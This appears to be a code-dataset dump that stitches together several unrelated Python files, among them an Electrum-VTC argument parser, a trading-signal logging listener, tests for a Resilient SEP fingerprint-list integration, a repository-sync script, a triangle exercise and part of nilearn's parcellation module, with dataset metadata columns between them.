group.add_argument("--segwit", action="store_true", dest="segwit", default=False, help="The Wizard will create Segwit seed phrases (Testnet only).")
group.add_argument("--nolnet", action="store_true", dest="nolnet", default=False, help="Use Nolnet")
def get_parser():
# create main parser
parser = argparse.ArgumentParser(
epilog="Run 'electrum-vtc help <command>' to see the help for a command")
add_global_options(parser)
subparsers = parser.add_subparsers(dest='cmd', metavar='<command>')
# gui
parser_gui = subparsers.add_parser('gui', description="Run Electrum's Graphical User Interface.", help="Run GUI (default)")
parser_gui.add_argument("url", nargs='?', default=None, help="vertcoin URI (or bip70 file)")
parser_gui.add_argument("-g", "--gui", dest="gui", help="select graphical user interface", choices=['qt', 'kivy', 'text', 'stdio', 'vtc'])
parser_gui.add_argument("-o", "--offline", action="store_true", dest="offline", default=False, help="Run offline")
parser_gui.add_argument("-m", action="store_true", dest="hide_gui", default=False, help="hide GUI on startup")
parser_gui.add_argument("-L", "--lang", dest="language", default=None, help="default language used in GUI")
add_network_options(parser_gui)
add_global_options(parser_gui)
# daemon
parser_daemon = subparsers.add_parser('daemon', help="Run Daemon")
parser_daemon.add_argument("subcommand", choices=['start', 'status', 'stop', 'load_wallet', 'close_wallet'], nargs='?')
#parser_daemon.set_defaults(func=run_daemon)
add_network_options(parser_daemon)
add_global_options(parser_daemon)
# commands
for cmdname in sorted(known_commands.keys()):
cmd = known_commands[cmdname]
p = subparsers.add_parser(cmdname, help=cmd.help, description=cmd.description)
add_global_options(p)
if cmdname == 'restore':
p.add_argument("-o", "--offline", action="store_true", dest="offline", default=False, help="Run offline")
for optname, default in zip(cmd.options, cmd.defaults):
a, b, help = command_options[optname]
action = "store_true" if type(default) is bool else 'store'
args = (a, b) if a else (b,)
if action == 'store':
_type = arg_types.get(optname, str)
p.add_argument(*args, dest=optname, action=action, default=default, help=help, type=_type)
else:
p.add_argument(*args, dest=optname, action=action, default=default, help=help)
for param in cmd.params:
h = param_descriptions.get(param, '')
_type = arg_types.get(param, str)
p.add_argument(param, help=h, type=_type)
cvh = config_variables.get(cmdname)
if cvh:
group = p.add_argument_group('configuration variables', '(set with setconfig/getconfig)')
for k, v in cvh.items():
group.add_argument(k, nargs='?', help=v)
# 'gui' is the default command
parser.set_default_subparser('gui')
return parser
| 40.859091
| 205
| 0.618033
if cvh:
group = p.add_argument_group('configuration variables', '(set with setconfig/getconfig)')
for k, v in cvh.items():
group.add_argument(k, nargs='?', help=v)
# 'gui' is the default command
parser.set_default_subparser('gui')
return parser
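# Minimal usage sketch (illustrative):
#
#     parser = get_parser()
#     args = parser.parse_args(['daemon', 'start'])
#     assert args.cmd == 'daemon' and args.subcommand == 'start'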
| true
| true
|
1c4931b2ce54ed4a4a4fea489199492662beed88
| 482
|
py
|
Python
|
tradingsignal/listeners/logging_listener.py
|
TradingSignal/TradingSignal
|
7fd828fe51832addea65b928193ce625bd091f2c
|
[
"Apache-2.0"
] | 5
|
2020-10-06T14:39:06.000Z
|
2021-01-29T22:57:43.000Z
|
tradingsignal/listeners/logging_listener.py
|
TradingSignal/TradingSignal
|
7fd828fe51832addea65b928193ce625bd091f2c
|
[
"Apache-2.0"
] | null | null | null |
tradingsignal/listeners/logging_listener.py
|
TradingSignal/TradingSignal
|
7fd828fe51832addea65b928193ce625bd091f2c
|
[
"Apache-2.0"
] | null | null | null |
from typing import Text, Union, Any, Optional, Dict
from tradingsignal.listeners.event_listeners import EventListener
from tradingsignal.utils import ts_logging
class LoggingListener(EventListener):
"""write the results of data miner into log-file"""
def __init__(self, listener_config: Optional[Dict[Text, Any]] = {}) -> None:
self.listener_config = listener_config
def update(self, message: Union[Text, Any]) -> None:
ts_logging.info(str(message))
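# Minimal usage sketch (illustrative; not part of the original module):
if __name__ == "__main__":
    listener = LoggingListener()
    listener.update({"signal": "BUY", "symbol": "AAPL"})  # -> ts_logging.info(...)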
| 34.428571
| 80
| 0.736515
|
from typing import Text, Union, Any, Optional, Dict
from tradingsignal.listeners.event_listeners import EventListener
from tradingsignal.utils import ts_logging
class LoggingListener(EventListener):
def __init__(self, listener_config: Optional[Dict[Text, Any]] = None) -> None:
        self.listener_config = listener_config if listener_config is not None else {}
def update(self, message: Union[Text, Any]) -> None:
ts_logging.info(str(message))
| true
| true
|
1c49322b07d5450efbc1f93e9f32227158b33898
| 2,910
|
py
|
Python
|
fn_sep/tests/test_fn_sep_get_fingerprint_list.py
|
nickpartner-goahead/resilient-community-apps
|
097c0dbefddbd221b31149d82af9809420498134
|
[
"MIT"
] | 65
|
2017-12-04T13:58:32.000Z
|
2022-03-24T18:33:17.000Z
|
fn_sep/tests/test_fn_sep_get_fingerprint_list.py
|
nickpartner-goahead/resilient-community-apps
|
097c0dbefddbd221b31149d82af9809420498134
|
[
"MIT"
] | 48
|
2018-03-02T19:17:14.000Z
|
2022-03-09T22:00:38.000Z
|
fn_sep/tests/test_fn_sep_get_fingerprint_list.py
|
nickpartner-goahead/resilient-community-apps
|
097c0dbefddbd221b31149d82af9809420498134
|
[
"MIT"
] | 95
|
2018-01-11T16:23:39.000Z
|
2022-03-21T11:34:29.000Z
|
# -*- coding: utf-8 -*-
# (c) Copyright IBM Corp. 2010, 2019. All Rights Reserved.
# pragma pylint: disable=unused-argument, no-self-use
"""Tests for fn_sep_get_fingerprint_list function."""
from __future__ import print_function
import pytest
from mock import patch
from resilient_circuits.util import get_config_data, get_function_definition
from resilient_circuits import SubmitTestFunction, FunctionResult
from mock_artifacts import mocked_sep_client, get_mock_config
PACKAGE_NAME = "fn_sep"
FUNCTION_NAME = "fn_sep_get_fingerprint_list"
# Read the default configuration-data section from the package
config_data = get_mock_config()
# Provide a simulation of the Resilient REST API (uncomment to connect to a real appliance)
resilient_mock = "pytest_resilient_circuits.BasicResilientMock"
def assert_keys_in(json_obj, *keys):
for key in keys:
assert key in json_obj
def call_fn_sep_get_fingerprint_list_function(circuits, function_params, timeout=10):
# Fire a message to the function
evt = SubmitTestFunction("fn_sep_get_fingerprint_list", function_params)
circuits.manager.fire(evt)
event = circuits.watcher.wait("fn_sep_get_fingerprint_list_result", parent=evt, timeout=timeout)
assert event
assert isinstance(event.kwargs["result"], FunctionResult)
pytest.wait_for(event, "complete", True)
return event.kwargs["result"].value
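# The helper above follows the usual resilient-circuits test pattern: fire a
# SubmitTestFunction event, wait for the '<function_name>_result' child event,
# then unwrap the FunctionResult. Illustrative call from a test (using the
# circuits_app fixture; parameter values are placeholders):
#
#     value = call_fn_sep_get_fingerprint_list_function(
#         circuits_app, {"sep_domainid": "A9B4...", "sep_fingerprintlist_id": "Blacklist"})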
class TestFnSepGetFingerprintList:
""" Tests for the fn_sep_get_fingerprint_list function"""
def test_function_definition(self):
""" Test that the package provides customization_data that defines the function """
func = get_function_definition(PACKAGE_NAME, FUNCTION_NAME)
assert func is not None
@patch('fn_sep.components.fn_sep_get_fingerprint_list.Sepclient', side_effect=mocked_sep_client)
@pytest.mark.parametrize("sep_domainid, sep_fingerprintlist_id, sep_fingerprintlist_name, expected_results", [
("A9B4B7160946C25D24B6AA458EF5557F", "Blacklist", None, "582F9B6E0CC4C1DBBD772AAAF088CB3A")
])
def test_success(self, mock_get, circuits_app, sep_domainid, sep_fingerprintlist_id, sep_fingerprintlist_name,
expected_results):
""" Test calling with sample values for the parameters """
keys = ["content", "inputs", "metrics", "raw", "reason", "success", "version"]
keys_2 = ["data", "description", "groupIds", "hashType", "id", "name", "source"]
function_params = {
"sep_domainid": sep_domainid,
"sep_fingerprintlist_name": sep_fingerprintlist_name,
"sep_fingerprintlist_id": sep_fingerprintlist_id
}
results = call_fn_sep_get_fingerprint_list_function(circuits_app, function_params)
assert_keys_in(results, *keys)
content = results["content"]
assert_keys_in(content, *keys_2)
assert expected_results == content["data"][0]
| 43.432836
| 114
| 0.74433
|
from __future__ import print_function
import pytest
from mock import patch
from resilient_circuits.util import get_config_data, get_function_definition
from resilient_circuits import SubmitTestFunction, FunctionResult
from mock_artifacts import mocked_sep_client, get_mock_config
PACKAGE_NAME = "fn_sep"
FUNCTION_NAME = "fn_sep_get_fingerprint_list"
config_data = get_mock_config()
resilient_mock = "pytest_resilient_circuits.BasicResilientMock"
def assert_keys_in(json_obj, *keys):
for key in keys:
assert key in json_obj
def call_fn_sep_get_fingerprint_list_function(circuits, function_params, timeout=10):
evt = SubmitTestFunction("fn_sep_get_fingerprint_list", function_params)
circuits.manager.fire(evt)
event = circuits.watcher.wait("fn_sep_get_fingerprint_list_result", parent=evt, timeout=timeout)
assert event
assert isinstance(event.kwargs["result"], FunctionResult)
pytest.wait_for(event, "complete", True)
return event.kwargs["result"].value
class TestFnSepGetFingerprintList:
def test_function_definition(self):
func = get_function_definition(PACKAGE_NAME, FUNCTION_NAME)
assert func is not None
@patch('fn_sep.components.fn_sep_get_fingerprint_list.Sepclient', side_effect=mocked_sep_client)
@pytest.mark.parametrize("sep_domainid, sep_fingerprintlist_id, sep_fingerprintlist_name, expected_results", [
("A9B4B7160946C25D24B6AA458EF5557F", "Blacklist", None, "582F9B6E0CC4C1DBBD772AAAF088CB3A")
])
def test_success(self, mock_get, circuits_app, sep_domainid, sep_fingerprintlist_id, sep_fingerprintlist_name,
expected_results):
keys = ["content", "inputs", "metrics", "raw", "reason", "success", "version"]
keys_2 = ["data", "description", "groupIds", "hashType", "id", "name", "source"]
function_params = {
"sep_domainid": sep_domainid,
"sep_fingerprintlist_name": sep_fingerprintlist_name,
"sep_fingerprintlist_id": sep_fingerprintlist_id
}
results = call_fn_sep_get_fingerprint_list_function(circuits_app, function_params)
assert_keys_in(results, *keys)
content = results["content"]
assert_keys_in(content, *keys_2)
assert expected_results == content["data"][0]
| true
| true
|
1c49329107cffec488cce739bd64e89247a4a335
| 6,661
|
py
|
Python
|
sync_repositories/__main__.py
|
whisperity/sync-repositories
|
3dfa99e34ed39cfd9849e08a365f368484606a71
|
[
"MIT"
] | null | null | null |
sync_repositories/__main__.py
|
whisperity/sync-repositories
|
3dfa99e34ed39cfd9849e08a365f368484606a71
|
[
"MIT"
] | null | null | null |
sync_repositories/__main__.py
|
whisperity/sync-repositories
|
3dfa99e34ed39cfd9849e08a365f368484606a71
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python3
"""
SYNOPSIS: Automatically updates every found source code repository in the
current tree, or the specified path.
"""
import argparse
import os
import subprocess
import sys
from sync_repositories.credentials import Backends
from sync_repositories.credentials import keyring as kr
from sync_repositories.repository import get_repositories
def _main():
# Go into askpass-wrapper mode if the environment specifies it.
if 'SR_ASKPASS' in os.environ:
from sync_repositories.credentials import auto_askpass
auto_askpass.execute()
# Make sure execution doesn't flow through.
raise RuntimeError("askpass_wrapper didn't terminate properly.")
ARGS = argparse.ArgumentParser(
description="""Synchronise source control repositories found in the
current tree.""",
formatter_class=argparse.ArgumentDefaultsHelpFormatter
)
ARGS.add_argument('root_folder',
help="""The root of the directory tree where update
should be run.""",
nargs='?',
default=os.getcwd())
ARGS.add_argument('--do-not-ask', '--daemon', '-d',
dest='daemon',
action='store_true',
help="""Perform an automatic update of repositories,
skipping a repository if user interaction
would be necessary.""")
argv = ARGS.parse_args()
keyring = kr.SecretStorage.get_storage()
print("Checking '%s' for repositories..." % argv.root_folder,
file=sys.stderr)
repository_to_update_data = {}
# Perform a check that every repository's authentication status is known.
for repo in get_repositories(argv.root_folder):
repo_data = list()
for remote, url, parts in repo.get_remotes():
check_authentication = keyring.is_requiring_authentication(*parts)
needs_credentials, can_update = None, False
if check_authentication is None:
# We don't know yet whether the server requires
# authentication or not.
auth_checker = repo.get_auth_requirement_detector_for(
remote)()
try:
if auth_checker.check():
keyring.set_authenticating(*parts)
needs_credentials = True
else:
keyring.set_unauthenticated(*parts)
needs_credentials = False
can_update = True
except subprocess.CalledProcessError as cpe:
print("Failed to execute authentication check for "
"repository '%s' remote '%s':"
% (repo.path, remote))
print(cpe)
continue
elif check_authentication is False:
# We know that the server does not require authentication.
needs_credentials, can_update = False, True
else:
# We know that the server requires authentication.
needs_credentials = True
auth_backend = repo.get_authentication_method(remote)
if auth_backend == Backends.KEYRING:
if needs_credentials:
# If we realised that credentials are needed, check if
# credentials are properly known.
credentials_stored = keyring.get_credentials(*parts)
if not credentials_stored:
print("The repository '%s' has a remote server '%s' "
"is connected to, but the authentication "
"details for this server are not known!"
% (repo.path, remote))
if not argv.daemon:
# ... unless running in daemon mode, in which
# case the user won't be asked.
kr.discuss_keyring_security()
u, p = kr.ask_user_for_password(
keyring, url, parts, can_be_empty=False)
# Check if the given credentials are valid.
auth_checker = repo \
.get_auth_requirement_detector_for(remote)(
u, p)
if auth_checker.check_credentials():
can_update = True
else:
print("Invalid credentials given!",
file=sys.stderr)
protocol, server, port, objname = parts
keyring.delete_credential(protocol,
server,
port,
u,
objname)
else:
can_update = True
if can_update:
repo_data.append((remote, url, parts))
else:
print("... Skipping this repository from update.")
continue
repository_to_update_data[repo] = repo_data
# Update repositories that had been selected for actual update.
print("Performing repository updates...")
for repo, data in repository_to_update_data.items():
for remote, url, parts in data:
print("Updating '%s' from remote '%s'..." % (repo.path, remote))
auth_backend = repo.get_authentication_method(remote)
update_success = False
if auth_backend == Backends.KEYRING:
kr_creds = keyring.get_credentials(*parts)
if not kr_creds:
# If the server doesn't require authentication, don't
# provide credentials.
kr_creds = [(None, None)]
for kr_cred in kr_creds:
updater = repo.get_updater_for(remote)(*kr_cred)
update_success = update_success or updater.update()
if not update_success:
print("Failed to update '%s' from remote '%s'!"
% (repo.path, remote),
file=sys.stderr)
if __name__ == '__main__':
_main()
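# Typical invocations (illustrative):
#
#     python -m sync_repositories                  # update repos under the CWD
#     python -m sync_repositories --daemon ~/src   # skip repos needing interaction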
| 42.698718
| 78
| 0.513436
|
import argparse
import os
import subprocess
import sys
from sync_repositories.credentials import Backends
from sync_repositories.credentials import keyring as kr
from sync_repositories.repository import get_repositories
def _main():
if 'SR_ASKPASS' in os.environ:
from sync_repositories.credentials import auto_askpass
auto_askpass.execute()
raise RuntimeError("askpass_wrapper didn't terminate properly.")
ARGS = argparse.ArgumentParser(
description="""Synchronise source control repositories found in the
current tree.""",
formatter_class=argparse.ArgumentDefaultsHelpFormatter
)
ARGS.add_argument('root_folder',
help="""The root of the directory tree where update
should be run.""",
nargs='?',
default=os.getcwd())
ARGS.add_argument('--do-not-ask', '--daemon', '-d',
dest='daemon',
action='store_true',
help="""Perform an automatic update of repositories,
skipping a repository if user interaction
would be necessary.""")
argv = ARGS.parse_args()
keyring = kr.SecretStorage.get_storage()
print("Checking '%s' for repositories..." % argv.root_folder,
file=sys.stderr)
repository_to_update_data = {}
for repo in get_repositories(argv.root_folder):
repo_data = list()
for remote, url, parts in repo.get_remotes():
check_authentication = keyring.is_requiring_authentication(*parts)
needs_credentials, can_update = None, False
if check_authentication is None:
# We don't know yet whether the server requires
auth_checker = repo.get_auth_requirement_detector_for(
remote)()
try:
if auth_checker.check():
keyring.set_authenticating(*parts)
needs_credentials = True
else:
keyring.set_unauthenticated(*parts)
needs_credentials = False
can_update = True
except subprocess.CalledProcessError as cpe:
print("Failed to execute authentication check for "
"repository '%s' remote '%s':"
% (repo.path, remote))
print(cpe)
continue
elif check_authentication is False:
needs_credentials, can_update = False, True
else:
needs_credentials = True
auth_backend = repo.get_authentication_method(remote)
if auth_backend == Backends.KEYRING:
if needs_credentials:
credentials_stored = keyring.get_credentials(*parts)
if not credentials_stored:
print("The repository '%s' has a remote server '%s' "
"is connected to, but the authentication "
"details for this server are not known!"
% (repo.path, remote))
if not argv.daemon:
kr.discuss_keyring_security()
u, p = kr.ask_user_for_password(
keyring, url, parts, can_be_empty=False)
# Check if the given credentials are valid.
auth_checker = repo \
.get_auth_requirement_detector_for(remote)(
u, p)
if auth_checker.check_credentials():
can_update = True
else:
print("Invalid credentials given!",
file=sys.stderr)
protocol, server, port, objname = parts
keyring.delete_credential(protocol,
server,
port,
u,
objname)
else:
can_update = True
if can_update:
repo_data.append((remote, url, parts))
else:
print("... Skipping this repository from update.")
continue
repository_to_update_data[repo] = repo_data
# Update repositories that had been selected for actual update.
print("Performing repository updates...")
for repo, data in repository_to_update_data.items():
for remote, url, parts in data:
print("Updating '%s' from remote '%s'..." % (repo.path, remote))
auth_backend = repo.get_authentication_method(remote)
update_success = False
if auth_backend == Backends.KEYRING:
kr_creds = keyring.get_credentials(*parts)
if not kr_creds:
# If the server doesn't require authentication, don't
# provide credentials.
kr_creds = [(None, None)]
for kr_cred in kr_creds:
updater = repo.get_updater_for(remote)(*kr_cred)
update_success = update_success or updater.update()
if not update_success:
print("Failed to update '%s' from remote '%s'!"
% (repo.path, remote),
file=sys.stderr)
if __name__ == '__main__':
_main()
| true
| true
|
1c4932be8e576569e3c4e7823db66650224b721f
| 994
|
py
|
Python
|
pythonbrasil/exercicios/decisao/DE resp 15.py
|
adinsankofa/python
|
8f2f26c77015c0baaa76174e004406b4115272c7
|
[
"MIT"
] | null | null | null |
pythonbrasil/exercicios/decisao/DE resp 15.py
|
adinsankofa/python
|
8f2f26c77015c0baaa76174e004406b4115272c7
|
[
"MIT"
] | null | null | null |
pythonbrasil/exercicios/decisao/DE resp 15.py
|
adinsankofa/python
|
8f2f26c77015c0baaa76174e004406b4115272c7
|
[
"MIT"
] | null | null | null |
'''
Write a program that asks for the 3 sides of a triangle. The program should
report whether the values can form a triangle. If the sides do form a
triangle, indicate whether it is: equilateral, isosceles or scalene.
Hints:
Three sides form a triangle when the sum of any two sides is greater
than the third;
Equilateral triangle: three equal sides;
Isosceles triangle: any two equal sides;
Scalene triangle: three different sides;
'''
### ALGORITHM ###
a = int(input("Enter side A: "))
b = int(input("Enter side B: "))
c = int(input("Enter side C: "))
# The sides only form a triangle if the sum of any two is greater than the third.
if a + b > c and a + c > b and b + c > a:
    if a == b == c:
        print("Equilateral")
    elif a == b != c or a != b == c or a == c != b:
        print("Isosceles")
    else:
        print("Scalene")
else:
    print("The values cannot form a triangle")
### FUNCTION ###
def triangulo(a, b, c):
    if not (a + b > c and a + c > b and b + c > a):
        print("The values cannot form a triangle")
    elif a == b == c:
        print("Equilateral")
    elif a == b != c or a != b == c or a == c != b:
        print("Isosceles")
    else:
        print("Scalene")
| 27.611111
| 71
| 0.610664
|
a = int(input("Enter side A: "))
b = int(input("Enter side B: "))
c = int(input("Enter side C: "))
if a + b > c and a + c > b and b + c > a:
    if a == b == c:
        print("Equilateral")
    elif a == b != c or a != b == c or a == c != b:
        print("Isosceles")
    else:
        print("Scalene")
else:
    print("The values cannot form a triangle")
def triangulo(a, b, c):
    if not (a + b > c and a + c > b and b + c > a):
        print("The values cannot form a triangle")
    elif a == b == c:
        print("Equilateral")
    elif a == b != c or a != b == c or a == c != b:
        print("Isosceles")
    else:
        print("Scalene")
| true
| true
|
1c4932ce9eee5168bc71bca608758c9f07cc6305
| 19,257
|
py
|
Python
|
nilearn/regions/parcellations.py
|
celinede/nilearn
|
901a627c4c5ae491fef19d58307805b3657b3b7e
|
[
"BSD-2-Clause"
] | null | null | null |
nilearn/regions/parcellations.py
|
celinede/nilearn
|
901a627c4c5ae491fef19d58307805b3657b3b7e
|
[
"BSD-2-Clause"
] | null | null | null |
nilearn/regions/parcellations.py
|
celinede/nilearn
|
901a627c4c5ae491fef19d58307805b3657b3b7e
|
[
"BSD-2-Clause"
] | null | null | null |
"""Parcellation tools such as KMeans or Ward for fMRI images
"""
import numpy as np
from sklearn.base import clone
from sklearn.feature_extraction import image
from sklearn.externals.joblib import Memory, delayed, Parallel
from .rena_clustering import ReNA
from ..decomposition.multi_pca import MultiPCA
from ..input_data import NiftiLabelsMasker
from .._utils.compat import _basestring
from .._utils.niimg import _safe_get_data
from .._utils.niimg_conversions import _iter_check_niimg
def _estimator_fit(data, estimator, method=None):
""" Estimator to fit on the data matrix
Parameters
----------
data: numpy array
Data matrix
estimator: instance of estimator from sklearn
MiniBatchKMeans or AgglomerativeClustering
method: str, {'kmeans', 'ward', 'complete', 'average', 'rena'}
A method to choose between for brain parcellations.
Returns
-------
labels_: numpy.ndarray
labels_ estimated from estimator
"""
if method == 'rena':
rena = ReNA(mask_img=estimator.mask_img,
n_clusters=estimator.n_clusters,
scaling=estimator.scaling,
n_iter=estimator.n_iter,
threshold=estimator.threshold,
memory=estimator.memory,
memory_level=estimator.memory_level,
verbose=estimator.verbose)
rena.fit(data)
labels_ = rena.labels_
else:
estimator = clone(estimator)
estimator.fit(data.T)
labels_ = estimator.labels_
return labels_
def _check_parameters_transform(imgs, confounds):
"""A helper function to check the parameters and prepare for processing
as a list.
"""
if not isinstance(imgs, (list, tuple)) or \
isinstance(imgs, _basestring):
imgs = [imgs, ]
single_subject = True
elif isinstance(imgs, (list, tuple)) and len(imgs) == 1:
single_subject = True
else:
single_subject = False
if confounds is None and isinstance(imgs, (list, tuple)):
confounds = [None] * len(imgs)
if confounds is not None:
if not isinstance(confounds, (list, tuple)) or \
isinstance(confounds, _basestring):
confounds = [confounds, ]
if len(confounds) != len(imgs):
raise ValueError("Number of confounds given does not match with "
"the given number of images.")
return imgs, confounds, single_subject
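# Illustrative behaviour of the helper above (file names are hypothetical):
#     _check_parameters_transform('img.nii', None)
#     # -> (['img.nii'], [None], True)            single subject
#     _check_parameters_transform(['a.nii', 'b.nii'], None)
#     # -> (['a.nii', 'b.nii'], [None, None], False)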
def _labels_masker_extraction(img, masker, confound):
""" Helper function for parallelizing NiftiLabelsMasker extractor
on list of Nifti images.
Parameters
----------
img: 4D Nifti image like object
Image to process.
masker: instance of NiftiLabelsMasker
Used for extracting signals with fit_transform
confound: csv file or numpy array
Confound used for signal cleaning while extraction.
Passed to signal.clean
Returns
-------
signals: numpy array
Signals extracted on given img
"""
masker = clone(masker)
signals = masker.fit_transform(img, confounds=confound)
return signals
class Parcellations(MultiPCA):
"""Learn parcellations on fMRI images.
    Five different types of clustering methods can be used:
    kmeans, ward, complete, average and rena.
    kmeans will call MiniBatchKMeans, whereas
    ward, complete and average are used within AgglomerativeClustering, and
    rena will call ReNA.
    kmeans, ward, complete and average are leveraged from scikit-learn;
    rena is built into nilearn.
.. versionadded:: 0.4.1
Parameters
----------
method: str, {'kmeans', 'ward', 'complete', 'average', 'rena'}
A method to choose between for brain parcellations.
For a small number of parcels, kmeans is usually advisable.
For a large number of parcellations (several hundreds, or thousands),
ward and rena are the best options. Ward will give higher quality
parcels, but with increased computation time. ReNA is most useful as a
fast data-reduction step, typically dividing the signal size by ten.
n_parcels: int, default=50
Number of parcellations to divide the brain data into.
random_state: int or RandomState
Pseudo number generator state used for random sampling.
mask: Niimg-like object or NiftiMasker, MultiNiftiMasker instance
Mask/Masker used for masking the data.
        If a mask image is provided, it will be used in the MultiNiftiMasker.
        If an instance of MultiNiftiMasker is provided, then its parameters
        will be used in masking the data, overriding the default masker
        parameters.
If None, mask will be automatically computed by a MultiNiftiMasker
with default parameters.
smoothing_fwhm: float, optional default=4.
If smoothing_fwhm is not None, it gives the full-width half maximum in
millimeters of the spatial smoothing to apply to the signal.
standardize: boolean, optional
If standardize is True, the time-series are centered and normed:
their mean is put to 0 and their variance to 1 in the time dimension.
detrend: boolean, optional
Whether to detrend signals or not.
This parameter is passed to signal.clean. Please see the related
documentation for details
low_pass: None or float, optional
This parameter is passed to signal.clean. Please see the related
documentation for details
high_pass: None or float, optional
This parameter is passed to signal.clean. Please see the related
documentation for details
t_r: float, optional
This parameter is passed to signal.clean. Please see the related
documentation for details
target_affine: 3x3 or 4x4 matrix, optional
This parameter is passed to image.resample_img. Please see the
related documentation for details. The given affine will be
considered as same for all given list of images.
target_shape: 3-tuple of integers, optional
This parameter is passed to image.resample_img. Please see the
related documentation for details.
mask_strategy: {'background', 'epi' or 'template'}, optional
The strategy used to compute the mask: use 'background' if your
images present a clear homogeneous background, 'epi' if they
are raw EPI images, or you could use 'template' which will
extract the gray matter part of your data by resampling the MNI152
brain mask for your data's field of view.
Depending on this value, the mask will be computed from
masking.compute_background_mask, masking.compute_epi_mask or
masking.compute_gray_matter_mask. Default is 'epi'.
mask_args: dict, optional
If mask is None, these are additional parameters passed to
masking.compute_background_mask or masking.compute_epi_mask
to fine-tune mask computation. Please see the related documentation
for details.
scaling: bool, optional (default False)
Used only when the method selected is 'rena'. If scaling is True, each
cluster is scaled by the square root of its size, preserving the
l2-norm of the image.
n_iter: int, optional (default 10)
Used only when the method selected is 'rena'. Number of iterations of
the recursive neighbor agglomeration.
memory: instance of joblib.Memory or str
Used to cache the masking process.
By default, no caching is done. If a string is given, it is the
path to the caching directory.
memory_level: integer, optional
Rough estimator of the amount of memory used by caching. Higher value
means more memory for caching.
n_jobs: integer, optional
The number of CPUs to use to do the computation. -1 means
'all CPUs', -2 'all CPUs but one', and so on.
verbose: integer, optional
Indicate the level of verbosity. By default, nothing is printed.
Attributes
----------
`labels_img_`: Nifti1Image
Labels image to each parcellation learned on fmri images.
`masker_`: instance of NiftiMasker or MultiNiftiMasker
The masker used to mask the data
`connectivity_`: numpy.ndarray
voxel-to-voxel connectivity matrix computed from a mask.
        Note that this attribute is only set when the selected method is an
        agglomerative type: 'ward', 'complete' or 'average'.
Notes
-----
    * Transforming a list of Nifti images to a data matrix takes a few steps:
      the data dimensionality is first reduced using randomized SVD, then
      brain parcellations are built using KMeans or one of the agglomerative
      methods.
    * This object uses spatially-constrained AgglomerativeClustering for
      method='ward', 'complete' or 'average', and spatially-constrained ReNA
      clustering for method='rena'. The spatial (voxel-to-voxel) connectivity
      matrix is built internally, so there is no need to supply it explicitly.
"""
VALID_METHODS = ['kmeans', 'ward', 'complete', 'average', 'rena']
def __init__(self, method, n_parcels=50,
random_state=0, mask=None, smoothing_fwhm=4.,
standardize=False, detrend=False,
low_pass=None, high_pass=None, t_r=None,
target_affine=None, target_shape=None,
mask_strategy='epi', mask_args=None,
scaling=False, n_iter=10,
memory=Memory(cachedir=None),
memory_level=0, n_jobs=1, verbose=1):
self.method = method
self.n_parcels = n_parcels
self.scaling = scaling
self.n_iter = n_iter
MultiPCA.__init__(self, n_components=200,
random_state=random_state,
mask=mask, memory=memory,
smoothing_fwhm=smoothing_fwhm,
standardize=standardize, detrend=detrend,
low_pass=low_pass, high_pass=high_pass,
t_r=t_r, target_affine=target_affine,
target_shape=target_shape,
mask_strategy=mask_strategy,
mask_args=mask_args,
memory_level=memory_level,
n_jobs=n_jobs,
verbose=verbose)
def _raw_fit(self, data):
""" Fits the parcellation method on this reduced data.
Data are coming from a base decomposition estimator which computes
the mask and reduces the dimensionality of images using
randomized_svd.
Parameters
----------
data: ndarray
Shape (n_samples, n_features)
Returns
-------
labels: numpy.ndarray
Labels to each cluster in the brain.
connectivity: numpy.ndarray
voxel-to-voxel connectivity matrix computed from a mask.
            Note that this attribute is returned only for the agglomerative
            methods 'ward', 'complete' and 'average'.
"""
valid_methods = self.VALID_METHODS
if self.method is None:
raise ValueError("Parcellation method is specified as None. "
"Please select one of the method in "
"{0}".format(valid_methods))
if self.method is not None and self.method not in valid_methods:
raise ValueError("The method you have selected is not implemented "
"'{0}'. Valid methods are in {1}"
.format(self.method, valid_methods))
        # We delay importing Ward/AgglomerativeClustering and import the
        # plotting module before that: sklearn.cluster imports scipy's
        # hierarchy module, and hierarchy imports matplotlib, so we force
        # matplotlib to be imported first through our plotting module to
        # avoid a matplotlib backend display error on Travis.
try:
from nilearn import plotting
except Exception:
pass
components = MultiPCA._raw_fit(self, data)
mask_img_ = self.masker_.mask_img_
if self.verbose:
print("[{0}] computing {1}".format(self.__class__.__name__,
self.method))
if self.method == 'kmeans':
from sklearn.cluster import MiniBatchKMeans
kmeans = MiniBatchKMeans(n_clusters=self.n_parcels,
init='k-means++',
random_state=self.random_state,
verbose=max(0, self.verbose - 1))
labels = self._cache(_estimator_fit,
func_memory_level=1)(components.T, kmeans)
elif self.method == 'rena':
rena = ReNA(mask_img_, n_clusters=self.n_parcels,
scaling=self.scaling, n_iter=self.n_iter,
memory=self.memory, memory_level=self.memory_level,
verbose=max(0, self.verbose - 1))
method = 'rena'
labels = \
self._cache(_estimator_fit, func_memory_level=1)(components.T,
rena, method)
else:
mask_ = _safe_get_data(mask_img_).astype(np.bool)
shape = mask_.shape
connectivity = image.grid_to_graph(n_x=shape[0], n_y=shape[1],
n_z=shape[2], mask=mask_)
from sklearn.cluster import AgglomerativeClustering
agglomerative = AgglomerativeClustering(
n_clusters=self.n_parcels, connectivity=connectivity,
linkage=self.method, memory=self.memory)
labels = self._cache(_estimator_fit,
func_memory_level=1)(components.T,
agglomerative)
self.connectivity_ = connectivity
# Avoid 0 label
labels = labels + 1
self.labels_img_ = self.masker_.inverse_transform(labels)
return self
def _check_fitted(self):
"""Helper function to check whether fit is called or not.
"""
if not hasattr(self, 'labels_img_'):
raise ValueError("Object has no labels_img_ attribute. "
"Ensure that fit() is called before transform.")
def transform(self, imgs, confounds=None):
"""Extract signals from parcellations learned on fmri images.
Parameters
----------
imgs: List of Nifti-like images
See http://nilearn.github.io/manipulating_images/input_output.html.
Images to process.
confounds: List of CSV files or arrays-like, optional
Each file or numpy array in a list should have shape
(number of scans, number of confounds)
This parameter is passed to signal.clean. Please see the related
documentation for details. Must be of same length of imgs.
Returns
-------
region_signals: List of or 2D numpy.ndarray
Signals extracted for each label for each image.
            For example, for a single image the shape will be
            (number of scans, number of labels).
"""
self._check_fitted()
imgs, confounds, single_subject = _check_parameters_transform(
imgs, confounds)
        # Required for special cases such as extracting signals from a
        # list of 3D images.
imgs_list = _iter_check_niimg(imgs, atleast_4d=True)
masker = NiftiLabelsMasker(self.labels_img_,
mask_img=self.masker_.mask_img_,
smoothing_fwhm=self.smoothing_fwhm,
standardize=self.standardize,
detrend=self.detrend,
low_pass=self.low_pass,
high_pass=self.high_pass, t_r=self.t_r,
resampling_target='data',
memory=self.memory,
memory_level=self.memory_level,
verbose=self.verbose)
